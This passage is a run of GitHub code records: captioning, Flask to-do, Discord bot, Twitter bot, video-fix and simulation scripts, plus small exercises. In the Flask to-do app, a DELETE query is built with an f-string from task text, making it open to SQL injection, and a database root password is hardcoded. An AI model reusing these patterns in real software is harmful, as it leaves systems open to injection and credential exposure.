\"\n \"Please say 'Yes' or 'No'.\"\n )\n msg += \"\\n\\n\" + _input + \"\\n\"\n speak(msg)\n try:\n audio = r.listen(source, timeout=50, phrase_time_limit=50)\n resp = r.recognize_google(audio)\n return resp.lower() in (\"yes\", \"y\")\n except Exception as e:\n speak(f\"An error occurred while recognizing your response: {e}\")\n return False\n\n\ntemplate = \"\"\"\nInterpreting the Image Caption:\n\nCaption: {caption}\n\nPlease contribute your insights, interpretations, or clarifications to help unravel the meaning behind the generated caption.\n\nLet's embark on this meaningful journey together, embracing the opportunities presented by image captioning and the power of ChatGPT!\n\n\"\"\"\n\nprompt = PromptTemplate(input_variables=[\"caption\"], template=template)\nchatgpt_chain = LLMChain(\n llm=OpenAI(temperature=0),\n prompt=prompt,\n verbose=True,\n memory=ConversationBufferWindowMemory(k=2),\n)\n\n\ndef local_image_to_pil(path):\n img = Image.open(path).convert('RGB')\n return img\n\n\ndef generate_image_captions():\n local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n try:\n processor = BlipProcessor.from_pretrained(local_model_dir)\n model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n img_path = capture_image()\n img_url = local_image_to_pil(img_path)\n raw_image = img_url\n\n text = \"a photography of\"\n inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n out = model.generate(**inputs)\n caption = processor.decode(out[0], skip_special_tokens=True)\n print(caption)\n\n speak(\"Caption generated: \" + caption)\n\n if _approve(\"Do you want to retake the image?\"):\n generate_image_captions()\n else:\n interpretation = chatgpt_chain.predict(caption=caption)\n speak(\"Interpretation:\")\n speak(interpretation)\n\n except Exception as e:\n speak(\"An error occurred: \" + str(e))\n if _approve(\"Do you want to retake the image?\"):\n generate_image_captions()\n else:\n speak(\"Caption generation failed.\")\n\n\n\n","repo_name":"marvins56/GPT-4-BLIND-PERSONS","sub_path":"hackathon/cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39886417747","text":"from flask import *\r\nimport mysql.connector\r\n\r\napp = Flask(__name__)\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"Hp7584*529903*\",\r\n database=\"web\"\r\n)\r\n\r\nmycursor = mydb.cursor()\r\n\r\n\r\ndef get_key(dict, pkey):\r\n values = []\r\n for key, value in dict.items():\r\n if pkey == value:\r\n values.append(int(key) - 1)\r\n return values\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef hello_world():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/login\")\r\ndef login():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/tareas\", methods=[\"GET\", \"POST\"])\r\ndef tareas():\r\n mycursor.execute(\"SELECT nota FROM tareas WHERE usuario='root' \")\r\n result = mycursor.fetchall()\r\n tasks = [i[0] for i in result]\r\n if request.method == \"POST\":\r\n values = request.form.to_dict()\r\n if \"bt_add\" in request.form:\r\n sql = \"INSERT INTO tareas (usuario, nota) VALUES (%s, %s)\"\r\n val = (\"root\", values[\"task_to_add\"])\r\n mycursor.execute(sql,val)\r\n else:\r\n keys = get_key(values, \"on\")\r\n for index in keys:\r\n del_val = tasks[index]\r\n mycursor.execute(f\"DELETE FROM tareas WHERE nota='{del_val}'\")\r\n 
mydb.commit()\r\n return redirect(url_for(\"tareas\"))\r\n else:\r\n return render_template(\"Tareas.html\", tasks=tasks)\r\n\r\n\r\ndef main():\r\n mycursor.execute(\"SELECT nota FROM tareas WHERE usuario='root' \")\r\n result = mycursor.fetchall()\r\n tasks = []\r\n for i in result:\r\n tasks.append(i[0])\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n # main()\r\n","repo_name":"0244198/herrerpmtodolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16389380798","text":"\n# Escreva um programa que declare um inteiro, inicialize-o com O, e incremente-o de 1000 em 1000, imprimindo seu valor na tela, até que seu valor seja 100000 (cem mil).\n\na = 0\n\nwhile True:\n a = a + 1000\n print(a)\n if (a == 100000):\n break\n\n\n#OK","repo_name":"MARIAMEDEIRO/Python-list","sub_path":"atvvd3.py","file_name":"atvvd3.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2561731568","text":"import os\ncurrent_dir = os.getcwd()\n# files = os.listdir(current_dir)\nprint(current_dir)\n# print(files)\n\ndef fix_single_dir(current_dir, files):\n def file_filter(files):\n if files.endswith('.m4s'):\n return True\n return False\n files = list(filter(file_filter, files))\n\n path = []\n for i in range(len(files)):\n path.append(current_dir+\"\\\\\"+files[i])\n\n for i in range(len(files)):\n files[i] = files[i][:-3] + 'mp4'\n print(files)\n new_path=[]\n for i in range(len(files)):\n new_path.append(current_dir+\"\\\\\"+files[i])\n\n def fix_m4s(target_path:str, output_path:str, buffer_size=256*1024*1024) -> None:\n assert buffer_size > 0\n with open(target_path, 'rb') as f:\n header = f.read(32)\n new_header = header.replace(b'000000000', b'')\n new_header = new_header.replace(b'$', b' ')\n new_header = new_header.replace(b'avc1', b'')\n with open(output_path, 'wb') as output_file:\n output_file.write(new_header)\n i = f.read(buffer_size)\n while i:\n output_file.write(i)\n i = f.read(buffer_size)\n \n for i in range(len(files)):\n fix_m4s(path[i], new_path[i])\n\n \nfor root, dirs, files in os.walk(current_dir):\n # print(\"-----------root-----------\")\n # print(root)\n # print(\"-----------dirs-----------\")\n # print(dirs)\n # print(\"-----------files-----------\")\n # print(files)\n # next(root)\n # # for single_dir in root:\n # # print(single_dir)\n\n files = os.listdir(root)\n fix_single_dir(current_dir=root, files=files)\n","repo_name":"zty0510/bilibili_merge","sub_path":"fix_m4s.py","file_name":"fix_m4s.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41987278092","text":"#!/usr/bin/env python\n\n\"\"\"\nA class to perform calculation and approximations for obtaining quantities\n such as solar time, solar position, and the various types of solar irradiance.\n\"\"\"\n\nimport datetime\nimport numpy as np\n\nfrom simulation.common import helpers\n\n\nclass SolarCalculations:\n\n def __init__(self, golang=True, library=None):\n \"\"\"\n\n Initializes the instance of a SolarCalculations class\n\n :param golang: Boolean that determines whether GoLang implementations will be used when applicable.\n :param library: GoLang binaries library\n\n \"\"\"\n\n # Solar Constant in W/m2\n self.S_0 = 1353\n\n self.golang = golang\n self.lib = 
library\n\n # ----- Calculation of solar position in the sky -----\n\n @staticmethod\n def calculate_hour_angle(time_zone_utc, day_of_year, local_time, longitude):\n \"\"\"\n\n Calculates and returns the Hour Angle of the Sun in the sky.\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/solar-time\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :param np.ndarray longitude: The longitude of a location on Earth\n :returns: The Hour Angle in degrees.\n :rtype: np.ndarray\n\n \"\"\"\n\n lst = helpers.local_time_to_apparent_solar_time(time_zone_utc / 3600, day_of_year,\n local_time, longitude)\n\n hour_angle = 15 * (lst - 12)\n\n return hour_angle\n\n def calculate_elevation_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Elevation Angle of the Sun relative to a location on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/elevation-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset. For example, Vancouver has time_zone_utc = -7\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. 
(Adjust for Daylight Savings)\n :returns: The elevation angle in degrees\n :rtype: np.ndarray\n\n \"\"\"\n\n # Negative declination angles: Northern Hemisphere winter\n # 0 declination angle : Equinoxes (March 22, Sept 22)\n # Positive declination angle: Northern Hemisphere summer\n declination_angle = helpers.calculate_declination_angle(day_of_year)\n\n # Negative hour angles: Morning\n # 0 hour angle : Solar noon\n # Positive hour angle: Afternoon\n hour_angle = self.calculate_hour_angle(time_zone_utc, day_of_year,\n local_time, longitude)\n # From: https://en.wikipedia.org/wiki/Hour_angle#:~:text=At%20solar%20noon%20the%20hour,times%201.5%20hours%20before%20noon).\n # \"For example, at 10:30 AM local apparent time\n # the hour angle is −22.5° (15° per hour times 1.5 hours before noon).\"\n\n # mathy part is delegated to a helper function to optimize for numba compilation\n return helpers.compute_elevation_angle_math(declination_angle, hour_angle, latitude)\n\n def calculate_zenith_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Zenith Angle of the Sun relative to a location on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/azimuth-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param latitude: The latitude of a location on Earth\n :param longitude: The longitude of a location on Earth\n :param time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :return: The zenith angle in degrees\n :rtype: float\n\n \"\"\"\n\n elevation_angle = self.calculate_elevation_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n return 90 - elevation_angle\n\n def calculate_azimuth_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Azimuth Angle of the Sun relative to a location on the Earth.\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/azimuth-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param latitude: The latitude of a location on Earth\n :param longitude: The longitude of a location on Earth\n :param time_zone_utc: The UTC time zone of your area in hours of UTC offset. For example, Vancouver has time_zone_utc = -7\n :param day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param local_time: The local time in hours from midnight. 
(Adjust for Daylight Savings)\n :returns: The azimuth angle in degrees\n :rtype: np.ndarray\n\n \"\"\"\n\n declination_angle = helpers.calculate_declination_angle(day_of_year)\n hour_angle = self.calculate_hour_angle(time_zone_utc, day_of_year,\n local_time, longitude)\n\n term_1 = np.sin(np.radians(declination_angle)) * \\\n np.sin(np.radians(latitude))\n\n term_2 = np.cos(np.radians(declination_angle)) * \\\n np.sin(np.radians(latitude)) * \\\n np.cos(np.radians(hour_angle))\n\n elevation_angle = self.calculate_elevation_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n term_3 = np.float_(term_1 - term_2) / \\\n np.cos(np.radians(elevation_angle))\n\n if term_3 < -1:\n term_3 = -1\n elif term_3 > 1:\n term_3 = 1\n\n azimuth_angle = np.arcsin(term_3)\n\n return np.degrees(azimuth_angle)\n\n # ----- Calculation of sunrise and sunset times -----\n\n # ----- Calculation of modes of solar irradiance -----\n\n def calculate_DNI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation):\n \"\"\"\n\n Calculates the Direct Normal Irradiance from the Sun, relative to a location\n on the Earth (clearsky)\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. 
(Adjust for Daylight Savings)\n :param np.ndarray elevation: The local elevation of a location in metres\n :returns: The Direct Normal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n zenith_angle = self.calculate_zenith_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n a = 0.14\n\n # air_mass = 1 / (math.cos(math.radians(zenith_angle)) + \\\n # 0.50572*pow((96.07995 - zenith_angle), -1.6364))\n\n air_mass = np.float_(1) / np.float_(np.cos(np.radians(zenith_angle)))\n with np.errstate(over=\"ignore\"):\n DNI = self.S_0 * ((1 - a * elevation * 0.001) * np.power(np.power(0.7, air_mass),\n 0.678) + a * elevation * 0.001)\n return np.where(zenith_angle > 90, 0, DNI)\n\n def calculate_DHI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation):\n \"\"\"\n\n Calculates the Diffuse Horizontal Irradiance from the Sun, relative to a location\n on the Earth (clearsky)\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight\n :param np.ndarray elevation: The local elevation of a location in metres\n :returns: The Diffuse Horizontal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n DNI = self.calculate_DNI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n DHI = 0.1 * DNI\n\n return DHI\n\n def calculate_GHI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation, cloud_cover):\n \"\"\"\n\n Calculates the Global Horizontal Irradiance from the Sun, relative to a location\n on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset, without including the effects of Daylight Savings Time. 
For example, Vancouver has time_zone_utc = -8 year-round.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight.\n :param np.ndarray elevation: The local elevation of a location in metres\n :param np.ndarray cloud_cover: A NumPy array representing cloud cover as a percentage from 0 to 100\n :returns: The Global Horizontal Irradiance in W/m^2\n :rtype: np.ndarray\n\n \"\"\"\n\n DHI = self.calculate_DHI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n DNI = self.calculate_DNI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n zenith_angle = self.calculate_zenith_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n GHI = DNI * np.cos(np.radians(zenith_angle)) + DHI\n\n return self.apply_cloud_cover(GHI=GHI, cloud_cover=cloud_cover)\n\n @staticmethod\n def apply_cloud_cover(GHI, cloud_cover):\n \"\"\"\n\n Applies a cloud cover model to the GHI data.\n\n Cloud cover adjustment follows the equation laid out here:\n http://www.shodor.org/os411/courses/_master/tools/calculators/solarrad/\n\n :param np.ndarray GHI: Global Horizontal Index in W/m^2\n :param np.ndarray cloud_cover: A NumPy array representing cloud cover as a percentage from 0 to 100\n\n :returns: GHI after considering cloud cover data\n :rtype: np.ndarray\n\n \"\"\"\n\n assert np.logical_and(cloud_cover >= 0, cloud_cover <= 100).all()\n\n scaled_cloud_cover = cloud_cover / 100\n\n assert np.logical_and(scaled_cloud_cover >= 0,\n scaled_cloud_cover <= 1).all()\n\n return GHI * (1 - (0.75 * np.power(scaled_cloud_cover, 3.4)))\n\n # ----- Calculation of modes of solar irradiance, but returning numpy arrays -----\n def python_calculate_array_GHI_times(self, local_times):\n date = list(map(datetime.datetime.utcfromtimestamp, local_times))\n day_of_year = np.array(list(map(helpers.get_day_of_year_map, date)), dtype=np.float64)\n local_time = np.array(list(map(SolarCalculations.dateConvert, date)))\n return day_of_year, local_time\n\n @staticmethod\n def dateConvert(date):\n \"\"\"\n\n Convert a date into local time.\n\n :param datetime.date date: date to be converted\n :return: a date converted into local time.\n :rtype: int\n\n \"\"\"\n\n return date.hour + (float(date.minute * 60 + date.second) / 3600)\n\n def calculate_array_GHI(self, coords, time_zones, local_times,\n elevations, cloud_covers):\n \"\"\"\n\n Calculates the Global Horizontal Irradiance from the Sun, relative to a location\n on the Earth, for arrays of coordinates, times, elevations and weathers\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local_times and time_zones are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray coords: (float[N][lat, lng]) array of latitudes and longitudes\n :param np.ndarray time_zones: (int[N]) time zones at different locations in seconds relative to UTC\n :param np.ndarray local_times: (int[N]) unix time that the vehicle will be at each location. 
(Adjusted for Daylight Savings)\n :param np.ndarray elevations: (float[N]) elevation from sea level in m\n :param np.ndarray cloud_covers: (float[N]) percentage cloud cover in range of 0 to 1\n :returns: (float[N]) Global Horizontal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n if not self.golang:\n day_of_year, local_time = self.python_calculate_array_GHI_times(local_times)\n else:\n day_of_year, local_time = self.lib.golang_calculate_array_GHI_times(local_times)\n\n ghi = self.calculate_GHI(coords[:, 0], coords[:, 1], time_zones,\n day_of_year, local_time, elevations, cloud_covers)\n\n return ghi\n","repo_name":"UBC-Solar/Simulation","sub_path":"simulation/environment/SolarCalculations.py","file_name":"SolarCalculations.py","file_ext":"py","file_size_in_byte":15475,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"73136280194","text":"import calendar\nimport os\nimport tweepy\nfrom datetime import datetime as dt\nfrom dotenv import load_dotenv, find_dotenv\n\n# Load environment variables\nload_dotenv(find_dotenv())\n\n# Define constants\nAPI_KEY = os.getenv(\"api_key\")\nAPI_SECRET_KEY = os.getenv(\"api_secret_key\")\nACCESS_TOKEN = os.getenv(\"access_token\")\nACCESS_TOKEN_SECRET = os.getenv(\"access_token_secret\")\nVIDEO_PATH = 'nomina.mp4'\n\n# Authentication in Twitter API\nauth = tweepy.OAuth1UserHandler(\n API_KEY, API_SECRET_KEY, ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\n# Aux function to determine if today is a pay day\n\n\ndef is_payday():\n today = dt.today()\n t_day = today.day\n t_weekday = today.weekday()\n month_end = calendar.monthrange(today.year, today.month)[1]\n # Condition to determine of it is mid-month pay day\n cond_mid_month = (t_day == 15 and t_weekday not in [5, 6]) or (\n t_day in (13, 14) and t_weekday == 4)\n # Condition to determine of it is end-of-month pay day\n cond_end_month = (t_day == month_end and t_weekday not in [5, 6]) or (\n t_day in (month_end - 1, month_end - 2) and t_weekday == 4)\n # Check combined conditions and return\n return cond_mid_month or cond_end_month\n\n\nif is_payday():\n upload_result = api.media_upload(VIDEO_PATH)\n api.update_status(status=\"\", media_ids=[\n upload_result.media_id_string])\n","repo_name":"baldesco/betty_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23398786365","text":"#Import random module to access random.choice\nimport random\n\n#Get the choice of the player via input and the computer via random.choice\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\n#check win conditions with nested functions\ndef check_win(player, computer):\n print(f\"You chose {player}, computer chose {computer}.\")\n if player == computer:\n return \"It's a tie!\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors, you win!\"\n else:\n return \"Paper covers rock, you lose\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts paper, you lose.\"\n else:\n return \"paper covers rock, you win!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors, you lose.\"\n else:\n 
return \"Scissors cuts paper, you win!\"\n else:\n if player != \"rock\" or \"scissors\" or \"paper\":\n return \"You idiot, that's not a good choice, YOU ARE A LOSER!\"\n\n#Define the functions of the game \ndef game():\n choices = get_choices()\n result = check_win(choices[\"player\"], choices[\"computer\"])\n print(result)\n restart()\n\n#Restart the game function\ndef restart():\n restart = input(\"Do you wish to play again?(y or n): \")\n if restart == \"y\":\n game()\n else:\n quit()\n\n#run the game \ngame()\n","repo_name":"Roberius/rockpaperscissors","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73916727233","text":"import torch\nimport numpy as np\nfrom torch import autograd\nPFandUKF_test = False\nif torch.cuda.is_available() and not PFandUKF_test:\n dev = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n print(\"Running on the GPU\")\nelse:\n dev = torch.device(\"cpu\")\n torch.set_default_tensor_type('torch.FloatTensor')\n print(\"Running on the CPU\")\n\nr2 = 0.21\nvdB = -20 # ratio v=q2/r2\nv = 10 ** (vdB / 10)\nq2 = torch.mul(v, r2)\nq = torch.sqrt(q2)\n\nT = 200 # For other trajectories size need to be changed\nT_test = T\nm = 10 # For other vector size need to be changed\nn = 10 # For other vector size need to be changed\nF = torch.eye(10).to(dev)\nH = torch.diag(torch.tensor([0.1, 0.2, 0.3, 0.1, 0.2, 0.3, 0.1, 0.2, 0.3, 0.4])).to(dev)\nm1x_0 = torch.ones(m, 1).to(dev)\nm2x_0 = 0 * 0 * torch.eye(m).to(dev)\n\n\n\nL = torch.Tensor([[3, -1, 0, 0, 0, 0, -1, 0, 0, -1],\n [-1, 2, 0, 0, 0, 0, 0, 0, -1, 0],\n [0, 0, 2, -1, 0, 0, 0, -1, 0, 0],\n [0, 0, -1, 3, -1, -1, 0, 0, 0, 0],\n [0, 0, 0, -1, 3, 0, 0, -1, -1, 0],\n [0, 0, 0, -1, 0, 3, 0, 0, -1, -1],\n [-1, 0, 0, 0, 0, 0, 3, -1, 0, -1],\n [0, 0, -1, 0, -1, 0, -1, 3, 0, 0],\n [0, -1, 0, 0, -1, -1, 0, 0, 3, 0],\n [-1, 0, 0, 0, 0, -1, -1, 0, 0, 3]]).to(dev)\n\n# L = torch.Tensor([[6, -1, 0, -1, -1, -1, -1, 0, 0, -1],\n# [-1, 6, 0, -1, 0, -1, -1, -1, 0, -1],\n# [0, 0, 6, -1, -1, -1, 0, -1, -1, -1],\n# [-1, -1, -1, 6, -1, 0, -1, 0, 0, -1],\n# [-1, 0, -1, -1, 6, 0, -1, -1, -1, 0],\n# [-1, -1, -1, 0, 0, 6, 0, -1, -1, -1],\n# [-1, -1, 0, -1, -1, 0, 6, -1, -1, 0],\n# [0, -1, -1, 0, -1, -1, -1, 6, -1, 0],\n# [0, 0, -1, 0, -1, -1, -1, -1, 6, -1],\n# [-1, -1, -1, -1, 0, -1, 0, 0, -1, 6]])\n\n\n\nW, V = np.linalg.eig(L.cpu())\nV = torch.from_numpy(V).type(torch.FloatTensor).to(dev)\nV_t = torch.transpose(V, 0, 1).to(dev)\nL = torch.tensor(L).type(torch.FloatTensor).to(dev)\n\n\n\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2 # which is 3.1415927410125732\n\ndef f(x):\n return torch.matmul(F.type(torch.DoubleTensor), x.type(torch.DoubleTensor))\n\ndef h(x):\n return torch.matmul(H.type(torch.DoubleTensor), x.type(torch.DoubleTensor))\n\ndef Naive(x):\n H_inv = torch.inverse(H.to(dev))\n return torch.matmul(H_inv.type(torch.DoubleTensor), x.type(torch.DoubleTensor)).to(dev)\n\ndef getJacobian(x, a):\n try:\n if (x.size()[1] == 1):\n y = torch.reshape((x.T), [x.size()[0]])\n except:\n y = torch.reshape((x.T), [x.size()[0]])\n\n if (a == 'ObsAcc'):\n g = h\n elif (a == 'ModAcc'):\n g = f\n print(x.shape)\n Jac = autograd.functional.jacobian(g, y)\n Jac = Jac.view(-1, m)\n\n return Jac.to(dev)\n","repo_name":"NimrodLeinwand/GSP-KalmanNet","sub_path":"Simulations/Random 
Walk/Random_Walk_parameters.py","file_name":"Random_Walk_parameters.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71734537793","text":"from logging import Logger\nfrom typing import TYPE_CHECKING\n\nfrom discord.ext.commands import Bot, Cog, Context, command, has_role\n\nfrom onehead.common import (\n Player,\n Roles,\n get_bot_instance,\n get_logger,\n get_player_names,\n)\nfrom onehead.game import Game\nfrom onehead.protocols.database import IPlayerDatabase, Operation\n\nif TYPE_CHECKING:\n from onehead.core import Core\n\n\nlog: Logger = get_logger()\n\n\nclass Behaviour(Cog):\n MAX_BEHAVIOUR_SCORE = 10000\n MIN_BEHAVIOUR_SCORE = 0\n COMMEND_MODIFIER = 100\n REPORT_MODIFIER = -200\n\n def __init__(self, database: IPlayerDatabase) -> None:\n self.database: IPlayerDatabase = database\n\n @has_role(Roles.MEMBER)\n @command()\n async def commend(self, ctx: Context, player_name: str) -> None:\n \"\"\"\n Commend a player for playing well.\n \"\"\"\n\n bot: Bot = get_bot_instance()\n core: Core = bot.get_cog(\"Core\") # type: ignore[assignment]\n previous_game: Game | None = core.previous_game\n\n if previous_game is None or previous_game.radiant is None or previous_game.dire is None:\n await ctx.send(\"Unable to commend as a game is yet to be played.\")\n return\n\n commender: str = ctx.author.display_name\n radiant, dire = get_player_names(previous_game.radiant, previous_game.dire)\n if commender not in radiant and commender not in dire:\n await ctx.send(\n f\"{commender} did not participate in the previous game and therefore cannot commend another player.\"\n )\n return\n\n if commender == player_name:\n await ctx.send(f\"{commender} you cannot commend yourself, nice try...\")\n return\n\n if player_name not in radiant and player_name not in dire:\n await ctx.send(f\"{player_name} cannot be commended as they did not participate in the previous game.\")\n return\n\n if previous_game.has_been_previously_commended(commender, player_name):\n await ctx.send(f\"{player_name} has already been commended by {commender}.\")\n return\n\n player: Player | None = self.database.get(player_name)\n if player is None:\n await ctx.send(f\"{player_name} could not be found in the database.\")\n return\n\n current_behaviour_score: int = player[\"behaviour\"]\n\n new_score: int = min(current_behaviour_score + self.COMMEND_MODIFIER, self.MAX_BEHAVIOUR_SCORE)\n\n self.database.modify(player_name, \"behaviour\", new_score)\n self.database.modify(player_name, \"commends\", 1, operation=Operation.ADD)\n\n previous_game.add_commend(commender, player_name)\n\n await ctx.send(f\"{player_name} has been commended.\")\n\n @has_role(Roles.MEMBER)\n @command()\n async def report(self, ctx: Context, player_name: str, *, reason: str) -> None:\n \"\"\"\n Report a player for intentionally ruining the game experience.\n \"\"\"\n\n bot: Bot = get_bot_instance()\n core: Core = bot.get_cog(\"Core\") # type: ignore[assignment]\n previous_game: Game | None = core.previous_game\n\n if previous_game is None or previous_game.radiant is None or previous_game.dire is None:\n await ctx.send(\"Unable to report as a game is yet to be played.\")\n return\n\n reporter: str = ctx.author.display_name\n radiant, dire = get_player_names(previous_game.radiant, previous_game.dire)\n if reporter not in radiant and reporter not in dire:\n await ctx.send(\n f\"{reporter} did not participate in the previous game and therefore cannot report 
another player.\"\n )\n return\n\n if reporter == player_name:\n await ctx.send(\n f\"{player_name} has brought dishonour upon themselves and has attempted to commit seppuku. OneHead will now allow it... UWU!\"\n )\n return\n\n if player_name not in radiant and player_name not in dire:\n await ctx.send(f\"{player_name} cannot be reported as they did not participate in the previous game.\")\n return\n\n if previous_game.has_been_previously_reported(reporter, player_name):\n await ctx.send(f\"{player_name} has already been reported by {reporter}.\")\n return\n\n player: Player | None = self.database.get(player_name)\n if player is None:\n await ctx.send(f\"{player_name} could not be found in the database.\")\n return\n\n current_behaviour_score: int = player[\"behaviour\"]\n\n new_score: int = max(current_behaviour_score + self.REPORT_MODIFIER, self.MIN_BEHAVIOUR_SCORE)\n\n self.database.modify(player_name, \"behaviour\", new_score)\n self.database.modify(player_name, \"reports\", 1, Operation.ADD)\n\n previous_game.add_report(reporter, player_name)\n\n log.info(f\"{ctx.author.display_name} reported {player_name} for {reason}\")\n\n await ctx.send(f\"{player_name} has been reported.\")\n","repo_name":"belmegatron/OneHead","sub_path":"onehead/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"2962503968","text":"from flask import Blueprint as _Blueprint\n\n\nclass Blueprint(_Blueprint):\n '''新增rp_list属性'''\n\n def __init__(self, name, import_name, rp_list=[], static_folder=None,\n static_url_path=None, template_folder=None,\n url_prefix=None, subdomain=None, url_defaults=None,\n root_path=None):\n self.rp_list = rp_list\n super(Blueprint, self).__init__(\n name, import_name, static_folder,\n static_url_path, template_folder,\n url_prefix, subdomain, url_defaults,\n root_path\n )\n\n @property\n def tags(self):\n '''\n Swagger API 文档分类\n 数组中的顺序代表 Swagger 中的顺序\n '''\n return [rp.api.tag for rp in self.rp_list]\n\n def register_redprint(self):\n for rp in self.rp_list:\n rp.api.register(self)\n return 